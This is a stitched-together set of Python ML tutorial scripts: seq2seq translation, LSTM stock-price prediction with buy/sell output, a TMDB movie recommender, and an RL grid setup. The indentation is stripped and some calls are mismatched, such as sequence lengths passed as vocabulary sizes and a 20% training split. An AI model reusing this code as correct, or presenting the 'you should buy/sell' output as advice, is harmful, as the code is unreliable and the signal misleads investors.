X = pad_sequences(tokenized, maxlen=source_sequence_length, padding="post")
X = X.reshape((1, 1, X.shape[-1]))
print(X.shape)
# X = to_categorical(X, num_classes=len(X_tk.word_index) + 1)
print(X.shape)
sequence = predict_sequence(enc, dec, X, target_sequence_length, source_sequence_length)
result = logits_to_text(sequence, y_tk.index_word)
print(result)
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import Input, LSTM, GRU, Dense, Embedding, Activation, Dropout, RepeatVector
from tensorflow.keras.layers import TimeDistributed
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical, plot_model
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
import numpy as np
import matplotlib.pyplot as plt
import os
import pickle
# hyper parameters
BATCH_SIZE = 32
EPOCHS = 10
LSTM_UNITS = 128
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
model = Sequential()
model.add(LSTM(LSTM_UNITS, input_shape=input_shape[1:]))
model.add(RepeatVector(output_sequence_length))
model.add(LSTM(LSTM_UNITS, return_sequences=True))
model.add(TimeDistributed(Dense(french_vocab_size, activation="softmax")))
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
return model
def create_model(num_encoder_tokens, num_decoder_tokens, latent_dim):
# define an input sequence
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder = LSTM(latent_dim, return_state=True)
# define the encoder output
encoder_outputs, state_h, state_c = encoder(encoder_inputs)
encoder_states = [state_h, state_c]
# encoder inference model
encoder_model = Model(encoder_inputs, encoder_states)
# set up the decoder now
decoder_inputs = Input(shape=(None, num_decoder_tokens))
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state=encoder_states)
decoder_dense = Dense(num_decoder_tokens, activation="softmax")
decoder_outputs = decoder_dense(decoder_outputs)
# decoder inference model
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_state_inputs = [decoder_state_input_h, decoder_state_input_c]
model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
decoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_state_inputs)
decoder_states = [state_h, state_c]
decoder_model = Model([decoder_inputs] + decoder_state_inputs, [decoder_outputs] + decoder_states)
return model, encoder_model, decoder_model
def get_batches(X, y, X_tk, y_tk, source_sequence_length, target_sequence_length, batch_size=BATCH_SIZE):
# get total number of words in X
num_encoder_tokens = len(X_tk.word_index) + 1
# get max number of words in all sentences in y
num_decoder_tokens = len(y_tk.word_index) + 1
while True:
for j in range(0, len(X), batch_size):
encoder_input_data = X[j: j+batch_size]
decoder_input_data = y[j: j+batch_size]
# redefine batch size
# it may differ (in last batch of dataset)
batch_size = encoder_input_data.shape[0]
# one-hot everything
# decoder_target_data = np.zeros((batch_size, num_decoder_tokens, target_sequence_length), dtype=np.uint8)
# encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens), dtype=np.uint8)
# decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens), dtype=np.uint8)
encoder_data = np.expand_dims(encoder_input_data, axis=1)
decoder_data = np.expand_dims(decoder_input_data, axis=1)
# for i, sequence in enumerate(decoder_input_data):
# for t, word_index in enumerate(sequence):
# # skip the first
# if t > 0:
# decoder_target_data[i, t-1, word_index] = 1
# decoder_data[i, t, word_index] = 1
# for i, sequence in enumerate(encoder_input_data):
# for t, word_index in enumerate(sequence):
# encoder_data[i, t, word_index] = 1
yield ([encoder_data, decoder_data], decoder_input_data)
def get_data(file):
X = []
y = []
# loading the data
for line in open(file, encoding="utf-8"):
if "\t" not in line:
continue
# split by tab
line = line.strip().split("\t")
input = line[0]
output = line[1]
output = f"{output} <eos>"
output_sentence_input = f"<sos> {output}"
X.append(input)
y.append(output)
# tokenize data
X_tk = Tokenizer()
X_tk.fit_on_texts(X)
X = X_tk.texts_to_sequences(X)
y_tk = Tokenizer()
y_tk.fit_on_texts(y)
y = y_tk.texts_to_sequences(y)
# define the max sequence length for X
source_sequence_length = max(len(x) for x in X)
# define the max sequence length for y
target_sequence_length = max(len(y_) for y_ in y)
# padding sequences
X = pad_sequences(X, maxlen=source_sequence_length, padding="post")
y = pad_sequences(y, maxlen=target_sequence_length, padding="post")
return X, y, X_tk, y_tk, source_sequence_length, target_sequence_length
def shuffle_data(X, y):
"""
Shuffles X & y while preserving their pair order
"""
state = np.random.get_state()
np.random.shuffle(X)
np.random.set_state(state)
np.random.shuffle(y)
return X, y
def split_data(X, y, train_split_rate=0.2):
# shuffle first
X, y = shuffle_data(X, y)
training_samples = round(len(X) * train_split_rate)
return X[:training_samples], y[:training_samples], X[training_samples:], y[training_samples:]
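# note: with the default train_split_rate of 0.2, only 20% of the samples end up in
# the training split and the remaining 80% in the test split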
if __name__ == "__main__":
# load the data
X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
# save tokenizers
pickle.dump(X_tk, open("X_tk.pickle", "wb"))
pickle.dump(y_tk, open("y_tk.pickle", "wb"))
# shuffle & split data
X_train, y_train, X_test, y_test = split_data(X, y)
# construct the models
model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
plot_model(model, to_file="model.png")
plot_model(enc, to_file="enc.png")
plot_model(dec, to_file="dec.png")
model.summary()
model.compile(optimizer="adam", loss="categorical_crossentropy", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/eng_fra_v1_{val_loss:.3f}.h5", save_best_only=True, verbose=2)
# train the model
model.fit_generator(get_batches(X_train, y_train, X_tk, y_tk, source_sequence_length, target_sequence_length),
validation_data=get_batches(X_test, y_test, X_tk, y_tk, source_sequence_length, target_sequence_length),
epochs=EPOCHS, steps_per_epoch=(len(X_train) // BATCH_SIZE),
validation_steps=(len(X_test) // BATCH_SIZE),
callbacks=[checkpointer])
print("[+] Model trained.")
model.save("results/eng_fra_v1.h5")
print("[+] Model saved.")
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import GRU, Input, Dense, TimeDistributed, Activation, RepeatVector, Bidirectional, Flatten
from tensorflow.keras.layers import Dropout, LSTM
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.losses import sparse_categorical_crossentropy
import collections
import numpy as np
LSTM_UNITS = 128
def get_data(file):
X = []
y = []
# loading the data
for line in open(file, encoding="utf-8"):
if "\t" not in line:
continue
# split by tab
line = line.strip().split("\t")
input = line[0]
output = line[1]
X.append(input)
y.append(output)
return X, y
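# a simple encoder-decoder: one LSTM encodes the source sentence into a fixed-size
# vector, RepeatVector copies that vector for every output timestep, a second LSTM
# decodes it, and a TimeDistributed Dense layer predicts a target word at each step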
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
model = Sequential()
model.add(LSTM(LSTM_UNITS, input_shape=input_shape[1:]))
model.add(RepeatVector(output_sequence_length))
model.add(LSTM(LSTM_UNITS, return_sequences=True))
model.add(TimeDistributed(Dense(french_vocab_size, activation="softmax")))
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
return model
def tokenize(x):
"""
Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)
"""
# TODO: Implement
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def pad(x, length=None):
"""
Pad x
:param x: List of sequences.
:param length: Length to pad the sequence to. If None, use length of longest sequence in x.
:return: Padded numpy array of sequences
"""
# TODO: Implement
sequences = pad_sequences(x, maxlen=length, padding='post')
return sequences
def preprocess(x, y):
"""
Preprocess x and y
:param x: Feature List of sentences
:param y: Label List of sentences
:return: Tuple of (Preprocessed x, Preprocessed y, x tokenizer, y tokenizer)
"""
preprocess_x, x_tk = tokenize(x)
preprocess_y, y_tk = tokenize(y)
preprocess_x = pad(preprocess_x)
preprocess_y = pad(preprocess_y)
# Keras's sparse_categorical_crossentropy function requires the labels to be in 3 dimensions
preprocess_y = preprocess_y.reshape(*preprocess_y.shape, 1)
return preprocess_x, preprocess_y, x_tk, y_tk
def logits_to_text(logits, tokenizer):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
index_to_words = {id: word for word, id in tokenizer.word_index.items()}
index_to_words[0] = '<PAD>'
return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
if __name__ == "__main__":
X, y = get_data("ara.txt")
english_words = [word for sentence in X for word in sentence.split()]
french_words = [word for sentence in y for word in sentence.split()]
english_words_counter = collections.Counter(english_words)
french_words_counter = collections.Counter(french_words)
print('{} English words.'.format(len(english_words)))
print('{} unique English words.'.format(len(english_words_counter)))
print('10 Most common words in the English dataset:')
print('"' + '" "'.join(list(zip(*english_words_counter.most_common(10)))[0]) + '"')
print()
print('{} French words.'.format(len(french_words)))
print('{} unique French words.'.format(len(french_words_counter)))
print('10 Most common words in the French dataset:')
print('"' + '" "'.join(list(zip(*french_words_counter.most_common(10)))[0]) + '"')
# Tokenize Example output
text_sentences = [
'The quick brown fox jumps over the lazy dog .',
'By Jove , my quick study of lexicography won a prize .',
'This is a short sentence .']
text_tokenized, text_tokenizer = tokenize(text_sentences)
print(text_tokenizer.word_index)
print()
for sample_i, (sent, token_sent) in enumerate(zip(text_sentences, text_tokenized)):
print('Sequence {} in x'.format(sample_i + 1))
print(' Input: {}'.format(sent))
print(' Output: {}'.format(token_sent))
# Pad Tokenized output
test_pad = pad(text_tokenized)
for sample_i, (token_sent, pad_sent) in enumerate(zip(text_tokenized, test_pad)):
print('Sequence {} in x'.format(sample_i + 1))
print(' Input: {}'.format(np.array(token_sent)))
print(' Output: {}'.format(pad_sent))
preproc_english_sentences, preproc_french_sentences, english_tokenizer, french_tokenizer =\
preprocess(X, y)
max_english_sequence_length = preproc_english_sentences.shape[1]
max_french_sequence_length = preproc_french_sentences.shape[1]
english_vocab_size = len(english_tokenizer.word_index)
french_vocab_size = len(french_tokenizer.word_index)
print('Data Preprocessed')
print("Max English sentence length:", max_english_sequence_length)
print("Max French sentence length:", max_french_sequence_length)
print("English vocabulary size:", english_vocab_size)
print("French vocabulary size:", french_vocab_size)
tmp_x = pad(preproc_english_sentences, preproc_french_sentences.shape[1])
tmp_x = tmp_x.reshape((-1, preproc_french_sentences.shape[-2], 1))
print("tmp_x.shape:", tmp_x.shape)
print("preproc_french_sentences.shape:", preproc_french_sentences.shape)
# Train the neural network
# increase the passed vocabulary sizes by 1 to avoid an index error
encdec_rnn_model = create_encdec_model(
tmp_x.shape,
preproc_french_sentences.shape[1],
len(english_tokenizer.word_index)+1,
len(french_tokenizer.word_index)+1)
print(encdec_rnn_model.summary())
# reduced batch size
encdec_rnn_model.fit(tmp_x, preproc_french_sentences, batch_size=256, epochs=3, validation_split=0.2)
# Print prediction(s)
print(logits_to_text(encdec_rnn_model.predict(tmp_x[1].reshape((1, tmp_x[1].shape[0], 1, )))[0], french_tokenizer))
print("Original text and translation:")
print(X[1])
print(y[1])
# OPTIONAL: Train and Print prediction(s)
print("="*50)
# Print prediction(s)
print(logits_to_text(encdec_rnn_model.predict(tmp_x[10].reshape((1, tmp_x[1].shape[0], 1)))[0], french_tokenizer))
print("Original text and translation:")
print(X[10])
print(y[10])
# OPTIONAL: Train and Print prediction(s)
from tensorflow.keras.layers import LSTM, Dense, Dropout
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
from sklearn.metrics import mean_absolute_error, mean_squared_error, accuracy_score
import os
import time
import glob
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from utils import classify, shift, create_model, load_data
class PricePrediction:
"""A Class utility to train and predict price of stocks/cryptocurrencies/trades
using keras model"""
def __init__(self, ticker_name, **kwargs):
"""
:param ticker_name (str): ticker name, e.g. aapl, nflx, etc.
:param n_steps (int): sequence length used to predict, default is 60
:param price_column (str): the name of column that contains price predicted, default is 'adjclose'
:param feature_columns (list): a list of feature column names used to train the model,
default is ['adjclose', 'volume', 'open', 'high', 'low']
:param target_column (str): target column name, default is 'future'
:param lookup_step (int): the future lookup step to predict, default is 1 (e.g. next day)
:param shuffle (bool): whether to shuffle the dataset, default is True
:param verbose (int): verbosity level, default is 1
==========================================
Model parameters
:param n_layers (int): number of recurrent neural network layers, default is 3
:param cell (keras.layers.RNN): RNN cell used to train keras model, default is LSTM
:param units (int): number of units of cell, default is 256
:param dropout (float): dropout rate ( from 0 to 1 ), default is 0.3
==========================================
Training parameters
:param batch_size (int): number of samples per gradient update, default is 64
:param epochs (int): number of epochs, default is 100
:param optimizer (str, keras.optimizers.Optimizer): optimizer used to train, default is 'adam'
:param loss (str, function): loss function used to minimize during training,
default is 'mae'
:param test_size (float): test size ratio from 0 to 1, default is 0.15
"""
self.ticker_name = ticker_name
self.n_steps = kwargs.get("n_steps", 60)
self.price_column = kwargs.get("price_column", 'adjclose')
self.feature_columns = kwargs.get("feature_columns", ['adjclose', 'volume', 'open', 'high', 'low'])
self.target_column = kwargs.get("target_column", "future")
self.lookup_step = kwargs.get("lookup_step", 1)
self.shuffle = kwargs.get("shuffle", True)
self.verbose = kwargs.get("verbose", 1)
self.n_layers = kwargs.get("n_layers", 3)
self.cell = kwargs.get("cell", LSTM)
self.units = kwargs.get("units", 256)
self.dropout = kwargs.get("dropout", 0.3)
self.batch_size = kwargs.get("batch_size", 64)
self.epochs = kwargs.get("epochs", 100)
self.optimizer = kwargs.get("optimizer", "adam")
self.loss = kwargs.get("loss", "mae")
self.test_size = kwargs.get("test_size", 0.15)
# create unique model name
self._update_model_name()
# runtime attributes
self.model_trained = False
self.data_loaded = False
self.model_created = False
# test price values
self.test_prices = None
# predicted price values for the test set
self.y_pred = None
# prices converted to buy/sell classes
self.classified_y_true = None
# predicted prices converted to buy/sell classes
self.classified_y_pred = None
# most recent price
self.last_price = None
# make folders if they do not exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
def create_model(self):
"""Construct and compile the keras model"""
self.model = create_model(input_length=self.n_steps,
units=self.units,
cell=self.cell,
dropout=self.dropout,
n_layers=self.n_layers,
loss=self.loss,
optimizer=self.optimizer)
self.model_created = True
if self.verbose > 0:
print("[+] Model created")
def train(self, override=False):
"""Train the keras model using self.checkpointer and self.tensorboard as keras callbacks.
If model created already trained, this method will load the weights instead of training from scratch.
Note that this method will create the model and load data if not called before."""
# if model isn't created yet, create it
if not self.model_created:
self.create_model()
# if data isn't loaded yet, load it
if not self.data_loaded:
self.load_data()
# if the model already exists and trained, just load the weights and return
# but if override is True, then just skip loading weights
if not override:
model_name = self._model_exists()
if model_name:
self.model.load_weights(model_name)
self.model_trained = True
if self.verbose > 0:
print("[*] Model weights loaded")
return
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
model_filename = self._get_model_filename()
self.checkpointer = ModelCheckpoint(model_filename, save_best_only=True, verbose=1)
        self.tensorboard = TensorBoard(log_dir=os.path.join("logs", self.model_name))
self.history = self.model.fit(self.X_train, self.y_train,
batch_size=self.batch_size,
epochs=self.epochs,
validation_data=(self.X_test, self.y_test),
callbacks=[self.checkpointer, self.tensorboard],
verbose=1)
self.model_trained = True
if self.verbose > 0:
print("[+] Model trained")
def predict(self, classify=False):
"""Predicts next price for the step self.lookup_step.
when classify is True, returns 0 for sell and 1 for buy"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
# reshape to fit the model input
last_sequence = self.last_sequence.reshape((self.last_sequence.shape[1], self.last_sequence.shape[0]))
# expand dimension
last_sequence = np.expand_dims(last_sequence, axis=0)
predicted_price = self.column_scaler[self.price_column].inverse_transform(self.model.predict(last_sequence))[0][0]
if classify:
last_price = self.get_last_price()
return 1 if last_price < predicted_price else 0
else:
return predicted_price
def load_data(self):
"""Loads and preprocess data"""
filename, exists = self._df_exists()
if exists:
# if the updated dataframe already exists in disk, load it
self.ticker = pd.read_csv(filename)
ticker = self.ticker
if self.verbose > 0:
print("[*] Dataframe loaded from disk")
else:
ticker = self.ticker_name
result = load_data(ticker,n_steps=self.n_steps, lookup_step=self.lookup_step,
shuffle=self.shuffle, feature_columns=self.feature_columns,
price_column=self.price_column, test_size=self.test_size)
# extract data
self.df = result['df']
self.X_train = result['X_train']
self.X_test = result['X_test']
self.y_train = result['y_train']
self.y_test = result['y_test']
self.column_scaler = result['column_scaler']
self.last_sequence = result['last_sequence']
if self.shuffle:
self.unshuffled_X_test = result['unshuffled_X_test']
self.unshuffled_y_test = result['unshuffled_y_test']
else:
self.unshuffled_X_test = self.X_test
self.unshuffled_y_test = self.y_test
self.original_X_test = self.unshuffled_X_test.reshape((self.unshuffled_X_test.shape[0], self.unshuffled_X_test.shape[2], -1))
self.data_loaded = True
if self.verbose > 0:
print("[+] Data loaded")
# save the dataframe to disk
self.save_data()
def get_last_price(self):
"""Returns the last price ( i.e the most recent price )"""
if not self.last_price:
self.last_price = float(self.df[self.price_column].tail(1))
return self.last_price
def get_test_prices(self):
"""Returns test prices. Note that this function won't return the whole sequences,
instead, it'll return only the last value of each sequence"""
if self.test_prices is None:
current = np.squeeze(self.column_scaler[self.price_column].inverse_transform([[ v[-1][0] for v in self.original_X_test ]]))
future = np.squeeze(self.column_scaler[self.price_column].inverse_transform(np.expand_dims(self.unshuffled_y_test, axis=0)))
self.test_prices = np.array(list(current) + [future[-1]])
return self.test_prices
def get_y_pred(self):
"""Get predicted values of the testing set of sequences ( y_pred )"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
if self.y_pred is None:
self.y_pred = np.squeeze(self.column_scaler[self.price_column].inverse_transform(self.model.predict(self.unshuffled_X_test)))
return self.y_pred
def get_y_true(self):
"""Returns original y testing values ( y_true )"""
test_prices = self.get_test_prices()
return test_prices[1:]
def _get_shifted_y_true(self):
"""Returns original y testing values shifted by -1.
This function is useful for converting to a classification problem"""
test_prices = self.get_test_prices()
return test_prices[:-1]
def _calc_classified_prices(self):
"""Convert regression predictions to a classification predictions ( buy or sell )
and set results to self.classified_y_pred for predictions and self.classified_y_true
for true prices"""
if self.classified_y_true is None or self.classified_y_pred is None:
current_prices = self._get_shifted_y_true()
future_prices = self.get_y_true()
predicted_prices = self.get_y_pred()
self.classified_y_true = list(map(classify, current_prices, future_prices))
self.classified_y_pred = list(map(classify, current_prices, predicted_prices))
# some metrics
def get_MAE(self):
"""Calculates the Mean-Absolute-Error metric of the test set"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
y_true = self.get_y_true()
y_pred = self.get_y_pred()
return mean_absolute_error(y_true, y_pred)
def get_MSE(self):
"""Calculates the Mean-Squared-Error metric of the test set"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
y_true = self.get_y_true()
y_pred = self.get_y_pred()
return mean_squared_error(y_true, y_pred)
def get_accuracy(self):
"""Calculates the accuracy after adding classification approach (buy/sell)"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
self._calc_classified_prices()
return accuracy_score(self.classified_y_true, self.classified_y_pred)
def plot_test_set(self):
"""Plots test data"""
future_prices = self.get_y_true()
predicted_prices = self.get_y_pred()
plt.plot(future_prices, c='b')
plt.plot(predicted_prices, c='r')
plt.xlabel("Days")
plt.ylabel("Price")
plt.legend(["Actual Price", "Predicted Price"])
plt.show()
def save_data(self):
"""Saves the updated dataframe if it does not exist"""
filename, exists = self._df_exists()
if not exists:
self.df.to_csv(filename)
if self.verbose > 0:
print("[+] Dataframe saved")
def _update_model_name(self):
stock = self.ticker_name.replace(" ", "_")
feature_columns_str = ''.join([ c[0] for c in self.feature_columns ])
time_now = time.strftime("%Y-%m-%d")
self.model_name = f"{time_now}_{stock}-{feature_columns_str}-loss-{self.loss}-{self.cell.__name__}-seq-{self.n_steps}-step-{self.lookup_step}-layers-{self.n_layers}-units-{self.units}"
def _get_df_name(self):
"""Returns the updated dataframe name"""
time_now = time.strftime("%Y-%m-%d")
return f"data/{self.ticker_name}_{time_now}.csv"
def _df_exists(self):
"""Check if the updated dataframe exists in disk, returns a tuple contains (filename, file_exists)"""
filename = self._get_df_name()
return filename, os.path.isfile(filename)
def _get_model_filename(self):
"""Returns the relative path of this model name with h5 extension"""
return f"results/{self.model_name}.h5"
def _model_exists(self):
"""Checks if model already exists in disk, returns the filename,
returns None otherwise"""
filename = self._get_model_filename()
return filename if os.path.isfile(filename) else None
# uncomment below to use CPU instead of GPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=4,
# inter_op_parallelism_threads=4,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from tensorflow.keras.layers import GRU, LSTM
from price_prediction import PricePrediction
ticker = "AAPL"
p = PricePrediction(ticker, feature_columns=['adjclose', 'volume', 'open', 'high', 'low'],
epochs=700, cell=LSTM, optimizer="rmsprop", n_layers=3, units=256,
loss="mse", shuffle=True, dropout=0.4)
p.train(True)
print(f"The next predicted price for {ticker} is {p.predict()}")
buy_sell = p.predict(classify=True)
print(f"you should {'sell' if buy_sell == 0 else 'buy'}.")
print("Mean Absolute Error:", p.get_MAE())
print("Mean Squared Error:", p.get_MSE())
print(f"Accuracy: {p.get_accuracy()*100:.3f}%")
p.plot_test_set()
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense, Dropout
from sklearn import preprocessing
from yahoo_fin import stock_info as si
from collections import deque
import pandas as pd
import numpy as np
import random
def create_model(input_length, units=256, cell=LSTM, n_layers=2, dropout=0.3, loss="mean_absolute_error", optimizer="rmsprop"):
model = Sequential()
for i in range(n_layers):
if i == 0:
# first layer
model.add(cell(units, return_sequences=True, input_shape=(None, input_length)))
model.add(Dropout(dropout))
elif i == n_layers -1:
# last layer
model.add(cell(units, return_sequences=False))
model.add(Dropout(dropout))
else:
# middle layers
model.add(cell(units, return_sequences=True))
model.add(Dropout(dropout))
model.add(Dense(1, activation="linear"))
model.compile(loss=loss, metrics=["mean_absolute_error"], optimizer=optimizer)
return model
def load_data(ticker, n_steps=60, scale=True, split=True, balance=False, shuffle=True,
lookup_step=1, test_size=0.15, price_column='Price', feature_columns=['Price'],
target_column="future", buy_sell=False):
"""Loads data from yahoo finance, if the ticker is a pd Dataframe,
it'll use it instead"""
if isinstance(ticker, str):
df = si.get_data(ticker)
elif isinstance(ticker, pd.DataFrame):
df = ticker
else:
raise TypeError("ticker can be either a str, or a pd.DataFrame instance")
result = {}
result['df'] = df.copy()
    # make sure the passed columns are in the dataframe
for col in feature_columns:
assert col in df.columns
column_scaler = {}
if scale:
# scale the data ( from 0 to 1 )
for column in feature_columns:
scaler = preprocessing.MinMaxScaler()
df[column] = scaler.fit_transform(np.expand_dims(df[column].values, axis=1))
column_scaler[column] = scaler
# df[column] = preprocessing.scale(df[column].values)
# add column scaler to the result
result['column_scaler'] = column_scaler
# add future price column ( shift by -1 )
df[target_column] = df[price_column].shift(-lookup_step)
# get last feature elements ( to add them to the last sequence )
# before deleted by df.dropna
last_feature_element = np.array(df[feature_columns].tail(1))
# clean NaN entries
df.dropna(inplace=True)
if buy_sell:
# convert target column to 0 (for sell -down- ) and to 1 ( for buy -up-)
df[target_column] = list(map(classify, df[price_column], df[target_column]))
seq_data = [] # all sequences here
# sequences are made with deque, which keeps the maximum length by popping out older values as new ones come in
sequences = deque(maxlen=n_steps)
for entry, target in zip(df[feature_columns].values, df[target_column].values):
sequences.append(entry)
if len(sequences) == n_steps:
seq_data.append([np.array(sequences), target])
# get the last sequence for future predictions
last_sequence = np.array(sequences)
# shift the sequence, one element is missing ( deleted by dropna )
last_sequence = shift(last_sequence, -1)
# fill the last element
last_sequence[-1] = last_feature_element
# add last sequence to results
result['last_sequence'] = last_sequence
if buy_sell and balance:
buys, sells = [], []
for seq, target in seq_data:
if target == 0:
sells.append([seq, target])
else:
buys.append([seq, target])
# balancing the dataset
lower_length = min(len(buys), len(sells))
buys = buys[:lower_length]
sells = sells[:lower_length]
seq_data = buys + sells
if shuffle:
unshuffled_seq_data = seq_data.copy()
# shuffle data
random.shuffle(seq_data)
X, y = [], []
for seq, target in seq_data:
X.append(seq)
y.append(target)
X = np.array(X)
y = np.array(y)
if shuffle:
unshuffled_X, unshuffled_y = [], []
for seq, target in unshuffled_seq_data:
unshuffled_X.append(seq)
unshuffled_y.append(target)
unshuffled_X = np.array(unshuffled_X)
unshuffled_y = np.array(unshuffled_y)
unshuffled_X = unshuffled_X.reshape((unshuffled_X.shape[0], unshuffled_X.shape[2], unshuffled_X.shape[1]))
X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
if not split:
# return original_df, X, y, column_scaler, last_sequence
result['X'] = X
result['y'] = y
return result
else:
# split dataset into training and testing
n_samples = X.shape[0]
train_samples = int(n_samples * (1 - test_size))
result['X_train'] = X[:train_samples]
result['X_test'] = X[train_samples:]
result['y_train'] = y[:train_samples]
result['y_test'] = y[train_samples:]
if shuffle:
result['unshuffled_X_test'] = unshuffled_X[train_samples:]
result['unshuffled_y_test'] = unshuffled_y[train_samples:]
return result
# from sentdex
def classify(current, future):
if float(future) > float(current): # if the future price is higher than the current, that's a buy, or a 1
return 1
else: # otherwise... it's a 0!
return 0
def shift(arr, num, fill_value=np.nan):
result = np.empty_like(arr)
if num > 0:
result[:num] = fill_value
result[num:] = arr[:-num]
elif num < 0:
result[num:] = fill_value
result[:num] = arr[-num:]
else:
result = arr
return result
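# A tiny demonstration (added for illustration; runs only when this utils module is
# executed directly): shift() with a negative `num` moves elements toward the front
# and pads the tail with `fill_value`, which is exactly how load_data() frees the
# last slot of the final sequence before overwriting it with `last_feature_element`.
if __name__ == "__main__":
    demo = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
    print(shift(demo, -1))                # [ 2.  3.  4.  5. nan]
    print(shift(demo, 2, fill_value=0))   # [0. 0. 1. 2. 3.]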
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.feature_extraction.text import TfidfVectorizer
movies_path = r"E:\datasets\recommender_systems\tmdb_5000_movies.csv"
credits_path = r"E:\datasets\recommender_systems\tmdb_5000_credits.csv"
credits = pd.read_csv(credits_path)
movies = pd.read_csv(movies_path)
# rename movie_id to id to merge dataframes later
credits = credits.rename(index=str, columns={'movie_id': 'id'})
# join on movie id column
movies = movies.merge(credits, on="id")
# drop useless columns
movies = movies.drop(columns=['homepage', 'title_x', 'title_y', 'status', 'production_countries'])
# number of votes of the movie
V = movies['vote_count']
# rating average of the movie from 0 to 10
R = movies['vote_average']
# the mean vote across the whole report
C = movies['vote_average'].mean()
# minimum votes required to be listed in the top 250
m = movies['vote_count'].quantile(0.7)
movies['weighted_average'] = (V/(V+m) * R) + (m/(m+V) * C)
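# Worked example (illustrative numbers only, not taken from the dataset): with
# m = 1000 minimum votes and a global mean C = 6.0, a movie rated R = 8.0 from
# V = 3000 votes scores (3000/4000) * 8.0 + (1000/4000) * 6.0 = 6.0 + 1.5 = 7.5,
# i.e. the weighted average pulls low-vote movies toward the global mean C.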
# ranked movies
wavg = movies.sort_values('weighted_average', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=wavg['weighted_average'].head(10), y=wavg['original_title'].head(10), data=wavg, palette='deep')
plt.xlim(6.75, 8.35)
plt.title('"Best" Movies by TMDB Votes', weight='bold')
plt.xlabel('Weighted Average Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('best_movies.png')
popular = movies.sort_values('popularity', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=popular['popularity'].head(10), y=popular['original_title'].head(10), data=popular, palette='deep')
plt.title('"Most Popular" Movies by TMDB Votes', weight='bold')
plt.xlabel('Popularity Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('popular_movies.png')
############ Content-Based ############
# filling NaNs with empty string
movies['overview'] = movies['overview'].fillna('')
tfv = TfidfVectorizer(min_df=3, max_features=None,
strip_accents='unicode', analyzer='word',token_pattern=r'\w{1,}',
ngram_range=(1, 3), use_idf=1,smooth_idf=1,sublinear_tf=1,
stop_words = 'english')
tfv_matrix = tfv.fit_transform(movies['overview'])
print(tfv_matrix.shape)
print(tfv_matrix)
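# A minimal sketch of one common next step for content-based filtering (added as an
# assumption for illustration, not necessarily the original author's continuation):
# compute pairwise similarity between overviews from the TF-IDF matrix, then look up
# the closest titles to a given movie.
from sklearn.metrics.pairwise import linear_kernel
similarity = linear_kernel(tfv_matrix, tfv_matrix)
title_to_index = pd.Series(movies.index, index=movies['original_title']).drop_duplicates()

def similar_movies(title, n=5):
    """Return the n movies whose overviews are most similar to `title`."""
    idx = int(title_to_index[title])
    scores = sorted(enumerate(similarity[idx]), key=lambda x: x[1], reverse=True)[1:n+1]
    return movies['original_title'].iloc[[i for i, _ in scores]]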
import numpy as np
from PIL import Image
import cv2 # showing the env
import matplotlib.pyplot as plt
import pickle
from matplotlib import style
import time
import os
from collections.abc import Iterable
style.use("ggplot")
GRID_SIZE = 10
# how many episodes
EPISODES = 1_000
# how many steps in the env
STEPS = 200
# Rewards for different events
MOVE_REWARD = -1
ENEMY_REWARD = -300
FOOD_REWARD = 30
epsilon = 0 # for randomness, it'll decay over time by EPSILON_DECAY
